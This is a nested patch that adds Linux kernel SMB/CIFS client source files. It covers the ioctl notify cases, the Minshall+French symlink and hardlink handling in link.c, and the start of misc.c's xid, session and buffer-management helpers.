++			if (tcon && tcon->ses->server->ops->notify) {
++				rc = tcon->ses->server->ops->notify(xid,
++						filep, (void __user *)arg,
++						false /* no ret data */);
++				cifs_dbg(FYI, "ioctl notify rc %d\n", rc);
++			} else
++				rc = -EOPNOTSUPP;
++			cifs_put_tlink(tlink);
++			break;
++		case CIFS_IOC_NOTIFY_INFO:
++			if (!S_ISDIR(inode->i_mode)) {
++				/* Notify can only be done on directories */
++				rc = -EOPNOTSUPP;
++				break;
++			}
++			cifs_sb = CIFS_SB(inode->i_sb);
++			tlink = cifs_sb_tlink(cifs_sb);
++			if (IS_ERR(tlink)) {
++				rc = PTR_ERR(tlink);
++				break;
++			}
++			tcon = tlink_tcon(tlink);
++			if (tcon && tcon->ses->server->ops->notify) {
++				rc = tcon->ses->server->ops->notify(xid,
++						filep, (void __user *)arg,
++						true /* return details */);
++				cifs_dbg(FYI, "ioctl notify info rc %d\n", rc);
++			} else
++				rc = -EOPNOTSUPP;
++			cifs_put_tlink(tlink);
++			break;
++		case CIFS_IOC_SHUTDOWN:
++			rc = cifs_shutdown(inode->i_sb, arg);
++			break;
++		default:
++			cifs_dbg(FYI, "unsupported ioctl\n");
++			break;
++	}
++cifs_ioc_exit:
++	free_xid(xid);
++	return rc;
++}
+diff --git a/fs/smb/client/link.c b/fs/smb/client/link.c
+new file mode 100644
+index 0000000000000..c0f101fc1e5d0
+--- /dev/null
++++ b/fs/smb/client/link.c
+@@ -0,0 +1,650 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/stat.h>
++#include <linux/slab.h>
++#include <linux/namei.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "smb2proto.h"
++#include "cifs_ioctl.h"
++
++/*
++ * M-F Symlink Functions - Begin
++ */
++
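++/*
++ * An MF (Minshall+French) symlink is stored as a regular file of exactly
++ * CIFS_MF_SYMLINK_FILE_SIZE bytes, laid out as the offsets below describe:
++ *
++ *   "XSym\n"            - 5 byte signature
++ *   "%04u\n"            - length of the target, 4 decimal digits plus '\n'
++ *   32 hex chars + '\n' - MD5 hash of the target string
++ *   target string       - up to 1024 bytes, '\n' terminated and space
++ *                         padded out to the fixed file size
++ */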
++#define CIFS_MF_SYMLINK_LEN_OFFSET (4+1)
++#define CIFS_MF_SYMLINK_MD5_OFFSET (CIFS_MF_SYMLINK_LEN_OFFSET+(4+1))
++#define CIFS_MF_SYMLINK_LINK_OFFSET (CIFS_MF_SYMLINK_MD5_OFFSET+(32+1))
++#define CIFS_MF_SYMLINK_LINK_MAXLEN (1024)
++#define CIFS_MF_SYMLINK_FILE_SIZE \
++	(CIFS_MF_SYMLINK_LINK_OFFSET + CIFS_MF_SYMLINK_LINK_MAXLEN)
++
++#define CIFS_MF_SYMLINK_LEN_FORMAT "XSym\n%04u\n"
++#define CIFS_MF_SYMLINK_MD5_FORMAT "%16phN\n"
++#define CIFS_MF_SYMLINK_MD5_ARGS(md5_hash) md5_hash
++
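++/*
++ * Compute the MD5 digest of the symlink target string; it is stored in the
++ * MF symlink file so that readers can validate the target when parsing.
++ */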
++static int
++symlink_hash(unsigned int link_len, const char *link_str, u8 *md5_hash)
++{
++	int rc;
++	struct shash_desc *md5 = NULL;
++
++	rc = cifs_alloc_hash("md5", &md5);
++	if (rc)
++		goto symlink_hash_err;
++
++	rc = crypto_shash_init(md5);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not init md5 shash\n", __func__);
++		goto symlink_hash_err;
++	}
++	rc = crypto_shash_update(md5, link_str, link_len);
++	if (rc) {
++		cifs_dbg(VFS, "%s: Could not update with link_str\n", __func__);
++		goto symlink_hash_err;
++	}
++	rc = crypto_shash_final(md5, md5_hash);
++	if (rc)
++		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
++
++symlink_hash_err:
++	cifs_free_hash(&md5);
++	return rc;
++}
++
++static int
++parse_mf_symlink(const u8 *buf, unsigned int buf_len, unsigned int *_link_len,
++		 char **_link_str)
++{
++	int rc;
++	unsigned int link_len;
++	const char *md5_str1;
++	const char *link_str;
++	u8 md5_hash[16];
++	char md5_str2[34];
++
++	if (buf_len != CIFS_MF_SYMLINK_FILE_SIZE)
++		return -EINVAL;
++
++	md5_str1 = (const char *)&buf[CIFS_MF_SYMLINK_MD5_OFFSET];
++	link_str = (const char *)&buf[CIFS_MF_SYMLINK_LINK_OFFSET];
++
++	rc = sscanf(buf, CIFS_MF_SYMLINK_LEN_FORMAT, &link_len);
++	if (rc != 1)
++		return -EINVAL;
++
++	if (link_len > CIFS_MF_SYMLINK_LINK_MAXLEN)
++		return -EINVAL;
++
++	rc = symlink_hash(link_len, link_str, md5_hash);
++	if (rc) {
++		cifs_dbg(FYI, "%s: MD5 hash failure: %d\n", __func__, rc);
++		return rc;
++	}
++
++	scnprintf(md5_str2, sizeof(md5_str2),
++		  CIFS_MF_SYMLINK_MD5_FORMAT,
++		  CIFS_MF_SYMLINK_MD5_ARGS(md5_hash));
++
++	if (strncmp(md5_str1, md5_str2, 17) != 0)
++		return -EINVAL;
++
++	if (_link_str) {
++		*_link_str = kstrndup(link_str, link_len, GFP_KERNEL);
++		if (!*_link_str)
++			return -ENOMEM;
++	}
++
++	*_link_len = link_len;
++	return 0;
++}
++
++static int
++format_mf_symlink(u8 *buf, unsigned int buf_len, const char *link_str)
++{
++	int rc;
++	unsigned int link_len;
++	unsigned int ofs;
++	u8 md5_hash[16];
++
++	if (buf_len != CIFS_MF_SYMLINK_FILE_SIZE)
++		return -EINVAL;
++
++	link_len = strlen(link_str);
++
++	if (link_len > CIFS_MF_SYMLINK_LINK_MAXLEN)
++		return -ENAMETOOLONG;
++
++	rc = symlink_hash(link_len, link_str, md5_hash);
++	if (rc) {
++		cifs_dbg(FYI, "%s: MD5 hash failure: %d\n", __func__, rc);
++		return rc;
++	}
++
++	scnprintf(buf, buf_len,
++		  CIFS_MF_SYMLINK_LEN_FORMAT CIFS_MF_SYMLINK_MD5_FORMAT,
++		  link_len,
++		  CIFS_MF_SYMLINK_MD5_ARGS(md5_hash));
++
++	ofs = CIFS_MF_SYMLINK_LINK_OFFSET;
++	memcpy(buf + ofs, link_str, link_len);
++
++	ofs += link_len;
++	if (ofs < CIFS_MF_SYMLINK_FILE_SIZE) {
++		buf[ofs] = '\n';
++		ofs++;
++	}
++
++	while (ofs < CIFS_MF_SYMLINK_FILE_SIZE) {
++		buf[ofs] = ' ';
++		ofs++;
++	}
++
++	return 0;
++}
++
++bool
++couldbe_mf_symlink(const struct cifs_fattr *fattr)
++{
++	if (!S_ISREG(fattr->cf_mode))
++		/* it's not a symlink */
++		return false;
++
++	if (fattr->cf_eof != CIFS_MF_SYMLINK_FILE_SIZE)
++		/* it's not a symlink */
++		return false;
++
++	return true;
++}
++
++static int
++create_mf_symlink(const unsigned int xid, struct cifs_tcon *tcon,
++		  struct cifs_sb_info *cifs_sb, const char *fromName,
++		  const char *toName)
++{
++	int rc;
++	u8 *buf;
++	unsigned int bytes_written = 0;
++
++	buf = kmalloc(CIFS_MF_SYMLINK_FILE_SIZE, GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	rc = format_mf_symlink(buf, CIFS_MF_SYMLINK_FILE_SIZE, toName);
++	if (rc)
++		goto out;
++
++	if (tcon->ses->server->ops->create_mf_symlink)
++		rc = tcon->ses->server->ops->create_mf_symlink(xid, tcon,
++					cifs_sb, fromName, buf, &bytes_written);
++	else
++		rc = -EOPNOTSUPP;
++
++	if (rc)
++		goto out;
++
++	if (bytes_written != CIFS_MF_SYMLINK_FILE_SIZE)
++		rc = -EIO;
++out:
++	kfree(buf);
++	return rc;
++}
++
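++/*
++ * If the file could be an MF symlink (a regular file of the magic size),
++ * read and parse it. On success the fattr is rewritten to describe a
++ * symlink; if the file turns out not to be an MF symlink, the fattr is
++ * left untouched and 0 is returned.
++ */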
++int
++check_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++		 struct cifs_sb_info *cifs_sb, struct cifs_fattr *fattr,
++		 const unsigned char *path)
++{
++	int rc;
++	u8 *buf = NULL;
++	unsigned int link_len = 0;
++	unsigned int bytes_read = 0;
++	char *symlink = NULL;
++
++	if (!couldbe_mf_symlink(fattr))
++		/* it's not a symlink */
++		return 0;
++
++	buf = kmalloc(CIFS_MF_SYMLINK_FILE_SIZE, GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	if (tcon->ses->server->ops->query_mf_symlink)
++		rc = tcon->ses->server->ops->query_mf_symlink(xid, tcon,
++					      cifs_sb, path, buf, &bytes_read);
++	else
++		rc = -ENOSYS;
++
++	if (rc)
++		goto out;
++
++	if (bytes_read == 0) /* not a symlink */
++		goto out;
++
++	rc = parse_mf_symlink(buf, bytes_read, &link_len, &symlink);
++	if (rc == -EINVAL) {
++		/* it's not a symlink */
++		rc = 0;
++		goto out;
++	}
++
++	if (rc != 0)
++		goto out;
++
++	/* it is a symlink */
++	fattr->cf_eof = link_len;
++	fattr->cf_mode &= ~S_IFMT;
++	fattr->cf_mode |= S_IFLNK | S_IRWXU | S_IRWXG | S_IRWXO;
++	fattr->cf_dtype = DT_LNK;
++	fattr->cf_symlink_target = symlink;
++out:
++	kfree(buf);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++/*
++ * SMB 1.0 Protocol specific functions
++ */
++
++int
++cifs_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++		      struct cifs_sb_info *cifs_sb, const unsigned char *path,
++		      char *pbuf, unsigned int *pbytes_read)
++{
++	int rc;
++	int oplock = 0;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct cifs_io_parms io_parms = {0};
++	int buf_type = CIFS_NO_BUFFER;
++	FILE_ALL_INFO file_info;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, &file_info);
++	if (rc)
++		return rc;
++
++	if (file_info.EndOfFile != cpu_to_le64(CIFS_MF_SYMLINK_FILE_SIZE)) {
++		rc = -ENOENT;
++		/* it's not a symlink */
++		goto out;
++	}
++
++	io_parms.netfid = fid.netfid;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
++
++	rc = CIFSSMBRead(xid, &io_parms, pbytes_read, &pbuf, &buf_type);
++out:
++	CIFSSMBClose(xid, tcon, fid.netfid);
++	return rc;
++}
++
++int
++cifs_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++		       struct cifs_sb_info *cifs_sb, const unsigned char *path,
++		       char *pbuf, unsigned int *pbytes_written)
++{
++	int rc;
++	int oplock = 0;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct cifs_io_parms io_parms = {0};
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_CREATE,
++		.path = path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc)
++		return rc;
++
++	io_parms.netfid = fid.netfid;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
++
++	rc = CIFSSMBWrite(xid, &io_parms, pbytes_written, pbuf);
++	CIFSSMBClose(xid, tcon, fid.netfid);
++	return rc;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++/*
++ * SMB 2.1/SMB3 Protocol specific functions
++ */
++int
++smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++		      struct cifs_sb_info *cifs_sb, const unsigned char *path,
++		      char *pbuf, unsigned int *pbytes_read)
++{
++	int rc;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct cifs_io_parms io_parms = {0};
++	int buf_type = CIFS_NO_BUFFER;
++	__le16 *utf16_path;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct smb2_file_all_info *pfile_info = NULL;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.path = path,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.fid = &fid,
++	};
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (utf16_path == NULL)
++		return -ENOMEM;
++
++	pfile_info = kzalloc(sizeof(struct smb2_file_all_info) + PATH_MAX * 2,
++			     GFP_KERNEL);
++
++	if (pfile_info == NULL) {
++		kfree(utf16_path);
++		return  -ENOMEM;
++	}
++
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, pfile_info, NULL,
++		       NULL, NULL);
++	if (rc)
++		goto qmf_out_open_fail;
++
++	if (pfile_info->EndOfFile != cpu_to_le64(CIFS_MF_SYMLINK_FILE_SIZE)) {
++		/* it's not a symlink */
++		rc = -ENOENT; /* Is there a better rc to return? */
++		goto qmf_out;
++	}
++
++	io_parms.netfid = fid.netfid;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
++	io_parms.persistent_fid = fid.persistent_fid;
++	io_parms.volatile_fid = fid.volatile_fid;
++	rc = SMB2_read(xid, &io_parms, pbytes_read, &pbuf, &buf_type);
++qmf_out:
++	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++qmf_out_open_fail:
++	kfree(utf16_path);
++	kfree(pfile_info);
++	return rc;
++}
++
++int
++smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++		       struct cifs_sb_info *cifs_sb, const unsigned char *path,
++		       char *pbuf, unsigned int *pbytes_written)
++{
++	int rc;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct cifs_io_parms io_parms = {0};
++	__le16 *utf16_path;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct kvec iov[2];
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.path = path,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_CREATE,
++		.fid = &fid,
++		.mode = 0644,
++	};
++
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
++		       NULL, NULL);
++	if (rc) {
++		kfree(utf16_path);
++		return rc;
++	}
++
++	io_parms.netfid = fid.netfid;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = CIFS_MF_SYMLINK_FILE_SIZE;
++	io_parms.persistent_fid = fid.persistent_fid;
++	io_parms.volatile_fid = fid.volatile_fid;
++
++	/* iov[0] is reserved for smb header */
++	iov[1].iov_base = pbuf;
++	iov[1].iov_len = CIFS_MF_SYMLINK_FILE_SIZE;
++
++	rc = SMB2_write(xid, &io_parms, pbytes_written, iov, 1);
++
++	/* Make sure we wrote all of the symlink data */
++	if ((rc == 0) && (*pbytes_written != CIFS_MF_SYMLINK_FILE_SIZE))
++		rc = -EIO;
++
++	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++
++	kfree(utf16_path);
++	return rc;
++}
++
++/*
++ * M-F Symlink Functions - End
++ */
++
++int
++cifs_hardlink(struct dentry *old_file, struct inode *inode,
++	      struct dentry *direntry)
++{
++	int rc = -EACCES;
++	unsigned int xid;
++	const char *from_name, *to_name;
++	void *page1, *page2;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct cifsInodeInfo *cifsInode;
++
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	xid = get_xid();
++	page1 = alloc_dentry_path();
++	page2 = alloc_dentry_path();
++
++	from_name = build_path_from_dentry(old_file, page1);
++	if (IS_ERR(from_name)) {
++		rc = PTR_ERR(from_name);
++		goto cifs_hl_exit;
++	}
++	to_name = build_path_from_dentry(direntry, page2);
++	if (IS_ERR(to_name)) {
++		rc = PTR_ERR(to_name);
++		goto cifs_hl_exit;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (tcon->unix_ext)
++		rc = CIFSUnixCreateHardLink(xid, tcon, from_name, to_name,
++					    cifs_sb->local_nls,
++					    cifs_remap(cifs_sb));
++	else {
++#else
++	{
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		server = tcon->ses->server;
++		if (!server->ops->create_hardlink) {
++			rc = -ENOSYS;
++			goto cifs_hl_exit;
++		}
++		rc = server->ops->create_hardlink(xid, tcon, from_name, to_name,
++						  cifs_sb);
++		if ((rc == -EIO) || (rc == -EINVAL))
++			rc = -EOPNOTSUPP;
++	}
++
++	d_drop(direntry);	/* force new lookup from server of target */
++
++	/*
++	 * if source file is cached (oplocked) revalidate will not go to server
++	 * until the file is closed or oplock broken so update nlinks locally
++	 */
++	if (d_really_is_positive(old_file)) {
++		cifsInode = CIFS_I(d_inode(old_file));
++		if (rc == 0) {
++			spin_lock(&d_inode(old_file)->i_lock);
++			inc_nlink(d_inode(old_file));
++			spin_unlock(&d_inode(old_file)->i_lock);
++
++			/*
++			 * Parent dir timestamps will update from the server
++			 * within a second; would it really be worth it to set
++			 * the parent dir cifs inode time to zero to force a
++			 * (faster) revalidate for it too?
++			 */
++		}
++		/*
++		 * If not oplocked, this will force a revalidate to get info
++		 * on the source file from the server. Note that Samba servers
++		 * prior to 4.2 have a bug and do not update the source file
++		 * ctime on hardlinks, but Windows servers handle it properly.
++		 */
++		cifsInode->time = 0;
++
++		/*
++		 * Will update parent dir timestamps from srv within a second.
++		 * Would it really be worth it to set the parent dir (cifs
++		 * inode) time field to zero to force revalidate on parent
++		 * directory faster ie
++		 *
++		 * CIFS_I(inode)->time = 0;
++		 */
++	}
++
++cifs_hl_exit:
++	free_dentry_path(page1);
++	free_dentry_path(page2);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++int
++cifs_symlink(struct user_namespace *mnt_userns, struct inode *inode,
++	     struct dentry *direntry, const char *symname)
++{
++	int rc = -EOPNOTSUPP;
++	unsigned int xid;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *pTcon;
++	const char *full_path;
++	void *page;
++	struct inode *newinode = NULL;
++
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	page = alloc_dentry_path();
++	if (!page)
++		return -ENOMEM;
++
++	xid = get_xid();
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink)) {
++		rc = PTR_ERR(tlink);
++		goto symlink_exit;
++	}
++	pTcon = tlink_tcon(tlink);
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto symlink_exit;
++	}
++
++	cifs_dbg(FYI, "Full path: %s\n", full_path);
++	cifs_dbg(FYI, "symname is %s\n", symname);
++
++	/* BB what if DFS and this volume is on different share? BB */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS)
++		rc = create_mf_symlink(xid, pTcon, cifs_sb, full_path, symname);
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	else if (pTcon->unix_ext)
++		rc = CIFSUnixCreateSymLink(xid, pTcon, full_path, symname,
++					   cifs_sb->local_nls,
++					   cifs_remap(cifs_sb));
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	/* else
++	   rc = CIFSCreateReparseSymLink(xid, pTcon, fromName, toName,
++					cifs_sb_target->local_nls); */
++
++	if (rc == 0) {
++		if (pTcon->posix_extensions)
++			rc = smb311_posix_get_inode_info(&newinode, full_path, inode->i_sb, xid);
++		else if (pTcon->unix_ext)
++			rc = cifs_get_inode_info_unix(&newinode, full_path,
++						      inode->i_sb, xid);
++		else
++			rc = cifs_get_inode_info(&newinode, full_path, NULL,
++						 inode->i_sb, xid, NULL);
++
++		if (rc != 0) {
++			cifs_dbg(FYI, "Create symlink ok, getinodeinfo fail rc = %d\n",
++				 rc);
++		} else {
++			d_instantiate(direntry, newinode);
++		}
++	}
++symlink_exit:
++	free_dentry_path(page);
++	cifs_put_tlink(tlink);
++	free_xid(xid);
++	return rc;
++}
+diff --git a/fs/smb/client/misc.c b/fs/smb/client/misc.c
+new file mode 100644
+index 0000000000000..31e06133acc3d
+--- /dev/null
++++ b/fs/smb/client/misc.c
+@@ -0,0 +1,1434 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#include <linux/slab.h>
++#include <linux/ctype.h>
++#include <linux/mempool.h>
++#include <linux/vmalloc.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "smberr.h"
++#include "nterr.h"
++#include "cifs_unicode.h"
++#include "smb2pdu.h"
++#include "cifsfs.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dns_resolve.h"
++#include "dfs_cache.h"
++#endif
++#include "fs_context.h"
++#include "cached_dir.h"
++
++extern mempool_t *cifs_sm_req_poolp;
++extern mempool_t *cifs_req_poolp;
++
++/*
++ * The xid serves as a useful identifier for each incoming vfs request,
++ * in a similar way to the mid which is useful to track each sent smb,
++ * and CurrentXid can also provide a running counter (although it
++ * will eventually wrap past zero) of the total vfs operations handled
++ * since the cifs fs was mounted.
++ */
++
++unsigned int
++_get_xid(void)
++{
++	unsigned int xid;
++
++	spin_lock(&GlobalMid_Lock);
++	GlobalTotalActiveXid++;
++
++	/* keep high water mark for number of simultaneous ops in filesystem */
++	if (GlobalTotalActiveXid > GlobalMaxActiveXid)
++		GlobalMaxActiveXid = GlobalTotalActiveXid;
++	if (GlobalTotalActiveXid > 65000)
++		cifs_dbg(FYI, "warning: more than 65000 requests active\n");
++	xid = GlobalCurrentXid++;
++	spin_unlock(&GlobalMid_Lock);
++	return xid;
++}
++
++void
++_free_xid(unsigned int xid)
++{
++	spin_lock(&GlobalMid_Lock);
++	/* if (GlobalTotalActiveXid == 0)
++		BUG(); */
++	GlobalTotalActiveXid--;
++	spin_unlock(&GlobalMid_Lock);
++}
++
++struct cifs_ses *
++sesInfoAlloc(void)
++{
++	struct cifs_ses *ret_buf;
++
++	ret_buf = kzalloc(sizeof(struct cifs_ses), GFP_KERNEL);
++	if (ret_buf) {
++		atomic_inc(&sesInfoAllocCount);
++		spin_lock_init(&ret_buf->ses_lock);
++		ret_buf->ses_status = SES_NEW;
++		++ret_buf->ses_count;
++		INIT_LIST_HEAD(&ret_buf->smb_ses_list);
++		INIT_LIST_HEAD(&ret_buf->tcon_list);
++		mutex_init(&ret_buf->session_mutex);
++		spin_lock_init(&ret_buf->iface_lock);
++		INIT_LIST_HEAD(&ret_buf->iface_list);
++		spin_lock_init(&ret_buf->chan_lock);
++	}
++	return ret_buf;
++}
++
++void
++sesInfoFree(struct cifs_ses *buf_to_free)
++{
++	struct cifs_server_iface *iface = NULL, *niface = NULL;
++
++	if (buf_to_free == NULL) {
++		cifs_dbg(FYI, "Null buffer passed to sesInfoFree\n");
++		return;
++	}
++
++	atomic_dec(&sesInfoAllocCount);
++	kfree(buf_to_free->serverOS);
++	kfree(buf_to_free->serverDomain);
++	kfree(buf_to_free->serverNOS);
++	kfree_sensitive(buf_to_free->password);
++	kfree(buf_to_free->user_name);
++	kfree(buf_to_free->domainName);
++	kfree_sensitive(buf_to_free->auth_key.response);
++	spin_lock(&buf_to_free->iface_lock);
++	list_for_each_entry_safe(iface, niface, &buf_to_free->iface_list,
++				 iface_head)
++		kref_put(&iface->refcount, release_iface);
++	spin_unlock(&buf_to_free->iface_lock);
++	kfree_sensitive(buf_to_free);
++}
++
++struct cifs_tcon *
++tconInfoAlloc(void)
++{
++	struct cifs_tcon *ret_buf;
++
++	ret_buf = kzalloc(sizeof(*ret_buf), GFP_KERNEL);
++	if (!ret_buf)
++		return NULL;
++	ret_buf->cfids = init_cached_dirs();
++	if (!ret_buf->cfids) {
++		kfree(ret_buf);
++		return NULL;
++	}
++
++	atomic_inc(&tconInfoAllocCount);
++	ret_buf->status = TID_NEW;
++	++ret_buf->tc_count;
++	spin_lock_init(&ret_buf->tc_lock);
++	INIT_LIST_HEAD(&ret_buf->openFileList);
++	INIT_LIST_HEAD(&ret_buf->tcon_list);
++	spin_lock_init(&ret_buf->open_file_lock);
++	spin_lock_init(&ret_buf->stat_lock);
++	atomic_set(&ret_buf->num_local_opens, 0);
++	atomic_set(&ret_buf->num_remote_opens, 0);
++
++	return ret_buf;
++}
++
++void
++tconInfoFree(struct cifs_tcon *tcon)
++{
++	if (tcon == NULL) {
++		cifs_dbg(FYI, "Null buffer passed to tconInfoFree\n");
++		return;
++	}
++	free_cached_dirs(tcon->cfids);
++	atomic_dec(&tconInfoAllocCount);
++	kfree(tcon->nativeFileSystem);
++	kfree_sensitive(tcon->password);
++	kfree(tcon);
++}
++
++struct smb_hdr *
++cifs_buf_get(void)
++{
++	struct smb_hdr *ret_buf = NULL;
++	/*
++	 * The SMB2 header is bigger than the CIFS one - no problem
++	 * clearing a few extra bytes for CIFS.
++	 */
++	size_t buf_size = sizeof(struct smb2_hdr);
++
++	/*
++	 * We could use the negotiated size instead of max_msgsize, but it
++	 * may be more efficient to always allocate the same size, albeit
++	 * slightly larger than necessary; maxbuffersize defaults to this
++	 * and cannot be bigger.
++	 */
++	ret_buf = mempool_alloc(cifs_req_poolp, GFP_NOFS);
++
++	/* clear the first few header bytes */
++	/* for most paths, more is cleared in header_assemble */
++	memset(ret_buf, 0, buf_size + 3);
++	atomic_inc(&buf_alloc_count);
++#ifdef CONFIG_CIFS_STATS2
++	atomic_inc(&total_buf_alloc_count);
++#endif /* CONFIG_CIFS_STATS2 */
++
++	return ret_buf;
++}
++
++void
++cifs_buf_release(void *buf_to_free)
++{
++	if (buf_to_free == NULL) {
++		/* cifs_dbg(FYI, "Null buffer passed to cifs_buf_release\n");*/
++		return;
++	}
++	mempool_free(buf_to_free, cifs_req_poolp);
++
++	atomic_dec(&buf_alloc_count);
++	return;
++}
++
++struct smb_hdr *
++cifs_small_buf_get(void)
++{
++	struct smb_hdr *ret_buf = NULL;
++
++	/*
++	 * We could use the negotiated size instead of max_msgsize, but it
++	 * may be more efficient to always allocate the same size, albeit
++	 * slightly larger than necessary; maxbuffersize defaults to this
++	 * and cannot be bigger.
++	 */
++	ret_buf = mempool_alloc(cifs_sm_req_poolp, GFP_NOFS);
++	/* No need to clear memory here, cleared in header assemble */
++	/*	memset(ret_buf, 0, sizeof(struct smb_hdr) + 27);*/
++	atomic_inc(&small_buf_alloc_count);
++#ifdef CONFIG_CIFS_STATS2
++	atomic_inc(&total_small_buf_alloc_count);
++#endif /* CONFIG_CIFS_STATS2 */
++
++	return ret_buf;
++}
++
++void
++cifs_small_buf_release(void *buf_to_free)
++{
++
++	if (buf_to_free == NULL) {
++		cifs_dbg(FYI, "Null buffer passed to cifs_small_buf_release\n");
++		return;
++	}
++	mempool_free(buf_to_free, cifs_sm_req_poolp);
++
++	atomic_dec(&small_buf_alloc_count);
++	return;
++}
++
++void
++free_rsp_buf(int resp_buftype, void *rsp)
++{
++	if (resp_buftype == CIFS_SMALL_BUFFER)
++		cifs_small_buf_release(rsp);
++	else if (resp_buftype == CIFS_LARGE_BUFFER)
++		cifs_buf_release(rsp);
++}
++
++/*
++ * NB: The MID can not be set if treeCon is not passed in; in that case
++ * it is the responsibility of the caller to set the mid.
++ */
++void
++header_assemble(struct smb_hdr *buffer, char smb_command /* command */ ,
++		const struct cifs_tcon *treeCon, int word_count
++		/* length of fixed section (word count) in two byte units  */)
++{
++	char *temp = (char *) buffer;
++
++	memset(temp, 0, 256); /* bigger than MAX_CIFS_HDR_SIZE */
++
++	buffer->smb_buf_length = cpu_to_be32(
++	    (2 * word_count) + sizeof(struct smb_hdr) -
++	    4 /*  RFC 1001 length field does not count */  +
++	    2 /* for bcc field itself */) ;
++
++	buffer->Protocol[0] = 0xFF;
++	buffer->Protocol[1] = 'S';
++	buffer->Protocol[2] = 'M';
++	buffer->Protocol[3] = 'B';
++	buffer->Command = smb_command;
++	buffer->Flags = 0x00;	/* case sensitive */
++	buffer->Flags2 = SMBFLG2_KNOWS_LONG_NAMES;
